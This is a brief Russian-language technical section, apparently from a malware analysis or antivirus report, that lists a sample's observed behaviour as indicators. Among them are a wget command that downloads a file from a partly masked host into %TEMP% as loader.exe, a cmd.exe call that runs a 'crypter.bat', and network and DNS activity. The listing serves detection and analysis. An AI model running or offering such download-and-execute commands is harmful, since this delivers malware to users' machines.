Техническая информация
- <Текущая директория>\wget.exe http://08##.com/t9r --output-document=""%TEMP%\loader.exe""
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\crypter.bat" "
- %TEMP%\loader.exe
- <Текущая директория>\wget.exe
- %TEMP%\1.tmp\crypter.bat
- '08##.com':80
- 08##.com/t9r
- DNS ASK 08##.com